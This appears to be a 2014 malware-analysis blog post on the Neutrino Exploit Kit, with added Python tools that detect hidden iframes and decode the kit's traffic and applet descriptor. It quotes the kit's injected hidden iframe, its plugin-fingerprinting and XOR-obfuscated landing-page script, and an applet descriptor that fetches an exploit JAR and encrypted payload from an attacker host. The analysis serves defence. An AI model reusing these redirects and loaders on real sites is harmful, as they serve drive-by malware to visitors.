Wednesday, January 29, 2014

Analysis - Neutrino Exploit Kit

Neutrino Exploit Kit started appearing in early 2013 and has since been actively used by cyber criminals to install various malware on users' machines without their consent, by exploiting client-side vulnerabilities. The criminals first find vulnerable websites and inject their redirection code there. Below is the most commonly seen redirection code.

 <div style="display:none"><iframe src="http://krvqmoxfsdygdihnf.game-host.org:8000/hxpkhwtbgsplmp?gmibgyrwlmv=7112268"></iframe></div>  
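As an added example (not code from the post or from the kit), the following Python scans a page's HTML for the kind of injected redirect shown above: an iframe that is concealed by a display:none ancestor or by its own style, or sized so that it cannot be seen, and whose source host is not the site's own host. The sample document is constructed for the example and embeds the iframe quoted above next to a legitimate, visible embed; the class and function names are mine.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: the injected snippet quoted above, placed inside an
# otherwise ordinary document that also carries a visible third-party iframe.
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<p>Some text<br>more text</p>
<iframe src="https://www.youtube.com/embed/abc123" width="560" height="315"></iframe>
<div style="display:none"><iframe src="http://krvqmoxfsdygdihnf.game-host.org:8000/hxpkhwtbgsplmp?gmibgyrwlmv=7112268"></iframe></div>
</body></html>"""

# Elements that never have a closing tag; they must not be pushed on the open-element stack.
VOID_TAGS = {"area", "base", "br", "col", "embed", "hr", "img", "input",
             "link", "meta", "source", "track", "wbr"}


def _is_hidden(style):
    """True if an inline style hides the element (whitespace and case are ignored)."""
    s = style.replace(" ", "").lower()
    return "display:none" in s or "visibility:hidden" in s


def _is_tiny(attrs):
    """True if width or height is 0 or 1 pixel, the other common way to hide an iframe."""
    def small(value):
        try:
            return float(str(value).rstrip("px")) <= 1
        except ValueError:
            return False
    return small(attrs.get("width", "")) or small(attrs.get("height", ""))


class HiddenIframeFinder(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.open_hidden = []   # one bool per open element: is it styled hidden?
        self.findings = []      # src of every concealed, off-site iframe

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            src = a.get("src", "")
            host = (urlparse(src).hostname or "").lower()
            concealed = any(self.open_hidden) or _is_hidden(a.get("style", "")) or _is_tiny(a)
            if concealed and host and host != self.site_host:
                self.findings.append(src)
        if tag not in VOID_TAGS:
            self.open_hidden.append(_is_hidden(a.get("style", "")))

    def handle_startendtag(self, tag, attrs):
        # Self-closing syntax (<iframe ... />): inspect it, then undo the push.
        self.handle_starttag(tag, attrs)
        if tag not in VOID_TAGS:
            self.open_hidden.pop()

    def handle_endtag(self, tag):
        if self.open_hidden:
            self.open_hidden.pop()


def find_hidden_iframes(html, site_host):
    """Return the src of each concealed iframe whose host differs from site_host."""
    finder = HiddenIframeFinder(site_host)
    finder.feed(html)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for src in find_hidden_iframes(SAMPLE_HTML, "www.example.com"):
        print("hidden off-site iframe:", src)
```

Running the scan over a site's own pages on a schedule, and alerting on any new result, catches this class of injection without having to know the attacker's domain in advance.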

The injected iframe redirects the user's browser to a site hosting the Neutrino Exploit Kit. The landing page of the kit looks like the following (the code has been cleaned up and unnecessary includes removed).

 <script src="jquery.min.js"></script>
 <script type="text/javascript" src="index.js"></script>
 <script type="text/javascript">
   // a = HID, b = server path, c = XOR key, d/e = form field names
   $(document).ready(function () {
     req("5214a385aaa2ccae0921cd32", "nsydaede", "fiai", "snzsbt", "dbigdkbylmtvoydo")
   });
   function req(a, b, c, d, e) {
     var l = PluginDetect.getVersion,
       g = [{
         adobe_reader: "AdobeReader"
       }, {
         java: "Java"
       }, {
         flash: "Flash"
       }, {
         quick_time: "QuickTime"
       }, {
         real_player: "RealPlayer"
       }, {
         shockwave: "Shockwave"
       }, {
         silver_light: "Silverlight"
       }, {
         vlc: "VLC"
       }, {
         wmp: "WMP"
       }],
       f = [];
     f.push("hid:::" + a);
     // ask PluginDetect for the version of each plugin
     for (var h in g)
       for (var k in g[h]) f.push(k + ":::" + l(g[h][k]));
     f.push("office:::" + office_ver());
     a = {};
     a[d] = c;
     a[e] = encodeURIComponent(xxxz(f.join(";;;"), c));
     $.get(b, a, function (a, b) {
       // the response is URL-encoded and XORed with the same key
       $("body").append(xxxz(decodeURIComponent(a), c))
     })
   }
   // repeating-key XOR, used for both the request and the response
   function xxxz(a, b) {
     for (var c = "", d = 0, e = 0, d = 0; d < a.length; d++) e = Math.floor(d % b.length), c += String.fromCharCode(a.charCodeAt(d) ^ b.charCodeAt(e));
     return c
   }
   function office_ver() {
     var a = 0,
       b = 0;
     try {
       a = new ActiveXObject("SharePoint.OpenDocuments.4")
     } catch (c) {}
     try {
       b = new ActiveXObject("SharePoint.OpenDocuments.3")
     } catch (d) {}
     return "object" == typeof a && "object" == typeof b ? "2010" : "number" == typeof a && "object" == typeof b ? "2007" : null
   };
 </script>

This code is responsible for harvesting the plugins installed in the browser and sending their details to the server. Once the installed plugins have been harvested, the details are obfuscated and sent to the Neutrino Exploit Kit server. The details also include a unique HID, which can be found in the landing page (in this case "5214a385aaa2ccae0921cd32"). Below is the non-obfuscated version of the details sent.

 Non-Obfuscated "hid:::5214a385aaa2ccae0921cd32;;;adobe_reader:::7,1,0,0;;;java:::1,7,0,10;;;flash:::11,4,402,265;;;quick_time:::null;;;real_player:::null;;;shockwave:::null;;;silver_light:::null;;;vlc:::null;;;wmp:::null;;;office:::null"   

The installed plugins and their versions are clearly visible above.

 Obfuscated - the plugin details as sent to the server in the POST request
 
 POST /nsydaede HTTP/1.1  
 x-requested-with: XMLHttpRequest
 Accept-Language: en-us
 Referer: http://sittoojimmvsftgcvuun.game-host.org:8000/hgvorbxobh?gkbiubmxbydx=8270053
 Accept: */*  
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
 Accept-Encoding: gzip, deflate
 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)  
 Host: sittoojimmvsftgcvuun.game-host.org:8000  
 Content-Length: 837  
 Connection: Keep-Alive  
 Pragma: no-cache  
   
 snzsbt=fiai&dbigdkbylmtvoydo=%250E%2500%2505S%255CST%255BW%255D%2500Z%255E%255C%2500%2508%2507%255B%2502%250A%2507%250CQPTX%2502%250DU%255BZR%255D%2508%2505%2506%2504%250C%253E%251B%2503%2508%2505%250C%2514S%255BSQEPEVEQR%255DR%250B%2508%2510%2508%255BS%255CXM%255EJYMXVRZR%2500%2505%2500%251A%250ES%255BSWXM%255DJ%255DQ%255BJ%255BW%255C%255DRZ%2518%2513%2500%2502%25029%251D%2508%2504%2503S%255BS%2508%251C%250D%2505%255DRZ%251B%2503%2508%250D6%2516%2505%2500%2510%2503%251B%255BS%255C%2507%2514%2505%250ARZR%2515%2501%250E%250A%250D%251E%2500%251F%2503S%255BS%2508%251C%250D%2505%255DRZ%251A%250F%2505%2517%250C%25146%250D%2500%2501%2501%2515S%255CS%250F%251C%250A%2505ZR%255D%251F%250D%250A%255CS%255B%2507%2513%2505%250DR%255DR%2516%2504%2516S%255BS%2508%251C%250D%2505%255DRZ%2506%2500%250F%2508%250A%2503S%255BS%2508%251C%250D%2505 

The response to this POST request carries the next stage as an obfuscated script. The response looks like this:

 Z%08%11%19%0A%0C%15Wl%60h%60o%60hU%16%08%13%08%0BI%0F%08%0B%0C%5CN%0C%07%0D%199%01%13%0C  
 NA%1F%07%05%14%0C%5BN%20%05%12G%0B%07%0A%19FWl%60h%60o%60hU%16%08%13%08%0BI%0F%08%0B%0C%5CN  
 %0C%07%0D%199%0C%0C%0B%03%0D%05%0C%02NA%1F%07%05%14%0C%5BN1-_%5D%03%3E%11%0E%05%040%10%02%5  
 B%0A%1F%03%03V%2C%3AR%1E%28%24%05%03%04%28%1F%3B.%0A%1C%3B%13V%0514%04-%3D%011%  
 13R%22%228%0D%23%228%0DQ%04S%1A%02%2A%24%06%02%040%041%3A%2C%2B%03%217%1C%04S%1A%02%2  
 A%2F%0E%02Z%24%058%13V%2C%3AR%1E%28%24%5D%03%3E%1E%1C%02%13%16%18%3B%07%01P%28%04%0EY  
 %05%21%27_-%10_%1881%3C%01%3B%07%01%1C8%5B_%1D%28%03R%22%228%0D%23%228%0D%231.%0A%1C%3B%04_  
 %10%03%3E%20Y%3E_%1C1%0E%09%23%228%0D%23%228%0D%231%214%19%05.%1E%051%02%20%1E%02.%1E%05  
 %05-%11%1F%05.%0AY%03.3B%22%0E%0D%23%228%0D%23%228%0DQ%05%040%1C%3B._%101%02_%108%3E%28%1A%  
 3B%3D%11%1F%05%040%1C%3B._%101%0E%09%23%228%0D%23%228%0DQ-%5B%0A%1C%3B%04_%10%03%3E%20Y%  
 3E_%1C1%0E%09%23%228%0D%23%228%0DQ%02%040%13%03Z0%108%5B0%131%0E%09%23%228%0D%23%228%0D%231  
 .%09%10%02%5B3%0E%21%2C%05%3B%03V%214Y%02-%09%1F-%5B%16%01%05%04%23%1C%02Z0%1C-%04  
 %28%1F%03%3A_%1E%02%04_%02%05%3E%28Y%02%10_%01%0514%1F%3B.%11%1F%03%2C%13%3B%3A%2F%0E%05  
 %040%10%02%5B%0A%1F%03%03V%2C%3ARZ%2A%10%2F%0E-%13R%22%228%0D%23%228%0D%23%22%3D%1E%1881  
 %2F%0E%21%2C%05%3B%03V%214Y%02-%09%1F-Z%28%19%05%214%1F%03%5B%16%19%03%3EW%5B%02%5  
 B%3CY%3B%5B%28%5B%0510%1C-%04%02%01%03%3E3%1D._%13%05%2AS%1F%02%04%05_.-%27%1E%2C%2A_%05  
 %3B1%2C%03%3B%21%20%5C%05%3E%28%1F%3B%3E%20%1D%04%3D_%5C8%3E0%04%040_%02.7PZ4_%021%16  
 %19%02%04%15%28.W%01%3ERP%28%074%10%05%3E3%28%2A%5EB%22%0E%0D%23%228%0D%23%22%3D%1  
 1%1F%02%040%13%03Z0%108%5B0%131%0E%09%23%228%0D%23%228%0DQ81%24%1E%03.0Y-%3E4%05%02%5B%2B%0  
 E%03%3E%20%19%03W%03%03.%20%13%02%13V0%3E%1EY%28%24%1C8%3EW%051%3A%2C%2B%02%21%24%  
 1A%3B17%28%21%02%19%3B%214%061%3A%2F%11%2C%2A%2F%0E.0%19%3B%5B%0EY1%3A%2F%11%2C%2A%2F  
 B%22%0E%0D%23%228%0D%23%228%0DQ%02.%20%108%3EV%0E%03%04%20%1D%3B%3DV9X_%01%02%21%24%1A%3  
 B14%0F%02Z%28%5B9Z%3C%01%03.%0A%02814%05%3B%2A%2F%0E%05%04%20%1A%05%3E3P%28%074%10%05%3E3%0  
 0%28%2A%5EB%22%0E%0D%23%228%0D%23%22%3D%1E%1E81%2C%01%03%3A%24%1C8%3EW%051%3A%2C%05%04.0%03  
 %28%24%5B8%3E%1EX%3B%3DV8%3C%0E%3A%2C.%28%2C%03Z%3C%24%2CYS%1E%3B%2C%0E%3A%05%04%2F%1  
 0%02%21%247%13%23%108%13%2C%08%2C%2F%09%105%03%2C%026%2F%3CX5.W%02.%2C1714%013%13%0A_  
 %3B%2C%2BX%05%04%28%1D8%13%3C93%2C%20Z5%3C%2B%5C%2F%05%0D%10%2C%3E%1E%03%03%3CS%5D8%5BW.%2C  
 %3E%2014%0308%2C%5B%1E%19%3B%2C%02%22%04.015%04%12%02%2CY%16%1B6%3E%09%11%02%044%20%02%21%0  
 E%05%03%3E%1E%5C81%05P1%3A%2F%0E-%13R%22%228%0D%23%228%0D%231%21%24%01%02%04%20%1D%28.S%01%  
 03%3E3P%28%07%0E%1B%3B1%0D%28%21%3C%01%03%210%051%3A%2C%1C%04%0A%1A%28%27%1F1%0E%0  
 9%23%228%0D%23%228%0DQ-%5B%20%1E%02.%1E%05%05%2AW%02%3B1%28%031%0E%09%23%228%0D%23%22%3D%11  
 %1F%04S%1A%02-RTFWl%60h%60o%60%5DF%07%19%11%05%03%1D_  

The script is de-obfuscated with the same "xxxz" function: the body of the POST response is URL-decoded and fed to the function with the same key, which returns the readable script shown below.
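As an added example, not part of the original post, the following Python reproduces the de-obfuscation in both directions. The POST body is URL-decoded twice (the landing page runs encodeURIComponent on the XORed report and jQuery then form-encodes that value again, which is why it begins with %25); the response is URL-decoded once; both are XORed with the key "fiai" that req() receives as c and that also travels in the clear in the request's first field. The sample strings are copied from the captures above and are truncated: the capture of the POST body is itself cut short, and only the first line of the response is used because the copy above has lost the NUL bytes (%00) that the scheme produces wherever a plaintext character equals the key character at that position, so later lines no longer line up with the key. Apart from xxxz, the function names are mine.

```python
from urllib.parse import unquote

# Key c from the landing page's req("5214a385aaa2ccae0921cd32", "nsydaede", "fiai", ...) call.
XOR_KEY = "fiai"

# Beginning of the POST body captured above (truncated; the capture on the page is cut short).
POST_BODY = (
    "snzsbt=fiai&dbigdkbylmtvoydo="
    "%250E%2500%2505S%255CST%255BW%255D%2500Z%255E%255C%2500%2508%2507%255B%2502%250A"
    "%2507%250CQPTX%2502%250DU%255BZR%255D%2508%2505%2506%2504%250C%253E%251B%2503%2508"
    "%2505%250C%2514S%255BSQEPEVEQR%255DR%250B%2508%2510%2508%255BS%255CXM%255EJYMXVRZR"
    "%2500%2505%2500%251A%250ES%255BSWXM%255DJ%255DQ%255BJ%255BW%255C%255DRZ%2518%2513"
    "%2500%2502%25029%251D"
)

# First line of the server's response as reproduced above.
RESPONSE_FIRST_LINE = "Z%08%11%19%0A%0C%15Wl%60h%60o%60hU%16%08%13%08%0BI%0F%08%0B%0C%5CN%0C%07%0D%199%01%13%0C"


def xxxz(data, key):
    """Repeating-key XOR, character for character the same as the landing page's xxxz()."""
    return "".join(chr(ord(ch) ^ ord(key[i % len(key)])) for i, ch in enumerate(data))


def decode_post_body(body):
    """Return (key, plaintext report) from the two-field form body.

    The landing page sends a[d] = c (the XOR key, unencoded) and
    a[e] = encodeURIComponent(xxxz(report, c)); jQuery form-encodes the second
    value once more, so it is the field containing '%' and needs two unquotes.
    """
    fields = dict(pair.split("=", 1) for pair in body.split("&"))
    key = next(v for v in fields.values() if "%" not in v)
    blob = next(v for v in fields.values() if "%" in v)
    return key, xxxz(unquote(unquote(blob)), key)


def parse_fingerprint(report):
    """Split 'name:::value;;;name:::value' into a dict; an incomplete trailing field is skipped."""
    result = {}
    for field in report.split(";;;"):
        if ":::" in field:
            name, value = field.split(":::", 1)
            result[name] = value
    return result


def decode_response(body, key=XOR_KEY):
    """The response is URL-encoded only once before the XOR."""
    return xxxz(unquote(body), key)


if __name__ == "__main__":
    key, report = decode_post_body(POST_BODY)
    print("key:", key)
    for name, value in parse_fingerprint(report).items():
        print(f"  {name} = {value}")
    print(repr(decode_response(RESPONSE_FIRST_LINE)))
```

Because the key is sent in the same request, a proxy or IDS that sees the request can recover the fingerprint without any secret; the obfuscation only defeats naive string matching on the wire.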

  <applet>   
  <param name='jnlp_href' value='Alt.jnlp'>   
  <param name='jnlp_embedded' value='PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4KCQkJCQk8am5scCBocmVmPSJBbHQuam5scCI   
  gc3BlYz0iMS4wIiB4bWxuczpqZng9Imh0dHA6Ly9qYXZhZnguY29tIj4KCQkJCQkJPGluZm9ybWF0aW9uPgoJCQkJCQkJP   
  HRpdGxlPkFwcGxldDwvdGl0bGU+CgkJCQkJCQk8dmVuZG9yPk9yYWNsZTwvdmVuZG9yPgoJCQkJCQk8L2luZm9ybWF0aW9   
  uPgoJCQkJCQk8cmVzb3VyY2VzPgoJCQkJCQkJPGoyc2UgaHJlZj0iaHR0cDovL2phdmEuc3VuLmNvbS9wcm9kdWN0cy9hd   
  XRvZGwvajJzZSIgdmVyc2lvbj0iMS43KyIgLz4KCQkJCQkJCTxqYXIgaHJlZj0iaHR0cDovL3NpdHRvb2ppbW12c2Z0Z2N   
  2dXVuLmdhbWUtaG9zdC5vcmc6ODAwMC9lZXJjZHF5dWNvZWFteT95YWVmamV6cGQ9a3R6cXppcmsiIG1haW49InRydWUiI   
  C8+CgkJCQkJCTwvcmVzb3VyY2VzPgoJCQkJCQk8YXBwbGV0LWRlc2MgbWFpbi1jbGFzcz0iQWx0IiBuYW1lPSJBcHBsZXQ   
  iIHdpZHRoPSIxMCIgaGVpZ2h0PSIxMCI+CgkJCQkJCQk8cGFyYW0gbmFtZT0iX19hcHBsZXRfc3N2X3ZhbGlkYXRlZCIgd   
  mFsdWU9InRydWUiIC8+CgkJCQkJCTxwYXJhbSBuYW1lPSJleGVjIiB2YWx1ZT0iYUhSMGNEb3ZMM05wZEhSdmIycHBiVzE   
  yYzJaMFoyTjJkWFZ1TG1kaGJXVXRhRzl6ZEM1dmNtYzZPREF3TUM5NlkyMWxjbU54Y21GMWFXUjVQM2xpZEdKeGVXTmtkM   
  0prWWoxcmRIcHhlbWx5YXc9PSIgLz4KCQkJCQkJPHBhcmFtIG5hbWU9InhrZXkiIHZhbHVlPSJuamlsIiAvPgoJCQkJCQk   
  8L2FwcGxldC1kZXNjPgoJCQkJCTwvam5scD4='>   
  </applet>   

Decoding the base64 value of jnlp_embedded reveals the JNLP descriptor for the applet that loads the Java exploit:

 <?xml version="1.0" encoding="utf-8"?>
 <jnlp href="Alt.jnlp" spec="1.0" xmlns:jfx="http://javafx.com">
   <information>
     <title>Applet</title>
     <vendor>Oracle</vendor>
   </information>
   <resources>
     <j2se href="http://java.sun.com/products/autodl/j2se" version="1.7+" />
     <jar href="http://sittoojimmvsftgcvuun.game-host.org:8000/eercdqyucoeamy?yaefjezpd=ktzqzirk" main="true" />
   </resources>
   <applet-desc main-class="Alt" name="Applet" width="10" height="10">
     <param name="__applet_ssv_validated" value="true" />
     <param name="exec" value="aHR0cDovL3NpdHRvb2ppbW12c2Z0Z2N2dXVuLmdhbWUtaG9zdC5vcmc6ODAwMC96Y21lcmNxcmF1aWR5P3lidGJxeWNkd3JkYj1rdHpxemlyaw==" />
     <param name="xkey" value="njil" />
   </applet-desc>
 </jnlp>

Once the JAR has been downloaded it exploits the Java vulnerability (as of writing, Neutrino serves CVE-2013-2465), then downloads the malware and executes it. The final payload downloaded by Neutrino is encrypted, and the JAR reads the values it needs to decrypt the binary from the parameters passed through the applet tag. The decryption therefore starts by fetching those parameters; the Java code below, from the applet, is responsible for it.

 // the parameter names are padded with digits and the digits stripped at run time
 String str = getParameter("7383568568e464564568465656x568458456845684568e6546845685684568c45845684878467864757584".replaceAll("[0-9]", ""));
 byte[] arrayOfByte = getParameter("357868538x456845685368363865754767638967895738565437568568k65835683568335683456836e5658356856865856356y65548548685454".replaceAll("[0-9]", "")).getBytes("ISO_8859_1");
 drp.dx(str, arrayOfByte);

Removing the digits shows that it fetches the params "exec" and "xkey". The "exec" param holds the URL of the encrypted EXE file (in this case "aHR0cDovL3NpdHRvb2ppbW12c2Z0Z2N2dXVuLmdhbWUtaG9zdC5vcmc6ODAwMC96Y21lcmNxcmF1aWR5P3lidGJxeWNkd3JkYj1rdHpxemlyaw==", which base64-decodes to hxxp://sittoojimmvsftgcvuun[.]game-host[.]org:8000/zcmercqrauidy?ybtbqycdwrdb=ktzqzirk), and "xkey" is the key for decrypting the payload (in this case "njil"). Below is how the encrypted payload looks in Wireshark.
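As an added example (not code from the post or from the kit), the following Python carries out the same recovery steps on the jnlp_embedded value shown above: it strips the digit padding from the two obfuscated parameter names, base64-decodes the JNLP, and reads the exec and xkey params, the jar URL and the main class from it, finally base64-decoding exec to the payload URL. The base64 text and the padded names are copied from the page; the function names are mine, and nothing here decrypts the payload, since the post does not describe that algorithm.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Digit-padded parameter names from the applet's Java code above.
OBFUSCATED_NAMES = (
    "7383568568e464564568465656x568458456845684568e6546845685684568c45845684878467864757584",
    "357868538x456845685368363865754767638967895738565437568568k65835683568335683456836e5658356856865856356y65548548685454",
)

# The jnlp_embedded value from the de-obfuscated applet tag above, joined back into one string.
JNLP_EMBEDDED_B64 = "".join([
    "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4KCQkJCQk8am5scCBocmVmPSJBbHQuam5scCI",
    "gc3BlYz0iMS4wIiB4bWxuczpqZng9Imh0dHA6Ly9qYXZhZnguY29tIj4KCQkJCQkJPGluZm9ybWF0aW9uPgoJCQkJCQkJP",
    "HRpdGxlPkFwcGxldDwvdGl0bGU+CgkJCQkJCQk8dmVuZG9yPk9yYWNsZTwvdmVuZG9yPgoJCQkJCQk8L2luZm9ybWF0aW9",
    "uPgoJCQkJCQk8cmVzb3VyY2VzPgoJCQkJCQkJPGoyc2UgaHJlZj0iaHR0cDovL2phdmEuc3VuLmNvbS9wcm9kdWN0cy9hd",
    "XRvZGwvajJzZSIgdmVyc2lvbj0iMS43KyIgLz4KCQkJCQkJCTxqYXIgaHJlZj0iaHR0cDovL3NpdHRvb2ppbW12c2Z0Z2N",
    "2dXVuLmdhbWUtaG9zdC5vcmc6ODAwMC9lZXJjZHF5dWNvZWFteT95YWVmamV6cGQ9a3R6cXppcmsiIG1haW49InRydWUiI",
    "C8+CgkJCQkJCTwvcmVzb3VyY2VzPgoJCQkJCQk8YXBwbGV0LWRlc2MgbWFpbi1jbGFzcz0iQWx0IiBuYW1lPSJBcHBsZXQ",
    "iIHdpZHRoPSIxMCIgaGVpZ2h0PSIxMCI+CgkJCQkJCQk8cGFyYW0gbmFtZT0iX19hcHBsZXRfc3N2X3ZhbGlkYXRlZCIgd",
    "mFsdWU9InRydWUiIC8+CgkJCQkJCTxwYXJhbSBuYW1lPSJleGVjIiB2YWx1ZT0iYUhSMGNEb3ZMM05wZEhSdmIycHBiVzE",
    "yYzJaMFoyTjJkWFZ1TG1kaGJXVXRhRzl6ZEM1dmNtYzZPREF3TUM5NlkyMWxjbU54Y21GMWFXUjVQM2xpZEdKeGVXTmtkM",
    "0prWWoxcmRIcHhlbWx5YXc9PSIgLz4KCQkJCQkJPHBhcmFtIG5hbWU9InhrZXkiIHZhbHVlPSJuamlsIiAvPgoJCQkJCQk",
    "8L2FwcGxldC1kZXNjPgoJCQkJCTwvam5scD4=",
])


def deobfuscate_name(padded):
    """Same transform the applet applies: drop every digit from the padded name."""
    return re.sub(r"[0-9]", "", padded)


def decode_jnlp(b64_text):
    """Base64-decode the jnlp_embedded value to the raw JNLP XML."""
    return base64.b64decode(b64_text)


def applet_details(jnlp_bytes):
    """Return (params, jar hrefs, main class) read from the JNLP descriptor."""
    root = ET.fromstring(jnlp_bytes)
    params = {p.get("name"): p.get("value") for p in root.iter("param")}
    jars = [j.get("href") for j in root.iter("jar")]
    desc = root.find("applet-desc")
    main_class = desc.get("main-class") if desc is not None else None
    return params, jars, main_class


def payload_url(params):
    """The exec param is the payload URL, base64-encoded."""
    return base64.b64decode(params["exec"]).decode("ascii")


def analyse(b64_text=JNLP_EMBEDDED_B64):
    params, jars, main_class = applet_details(decode_jnlp(b64_text))
    return {
        "param_names": [deobfuscate_name(n) for n in OBFUSCATED_NAMES],
        "jars": jars,
        "main_class": main_class,
        "payload_url": payload_url(params),
        "xkey": params.get("xkey"),
        "ssv_validated": params.get("__applet_ssv_validated"),
    }


if __name__ == "__main__":
    for name, value in analyse().items():
        print(f"{name}: {value}")
```

The jar href and the payload URL share the same host and the same trailing value, which is a useful pivot when hunting for other requests from the same infection in proxy logs.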


Using Data-Converter from KahuSecurity the encrypted binary can be easily decrypted. 

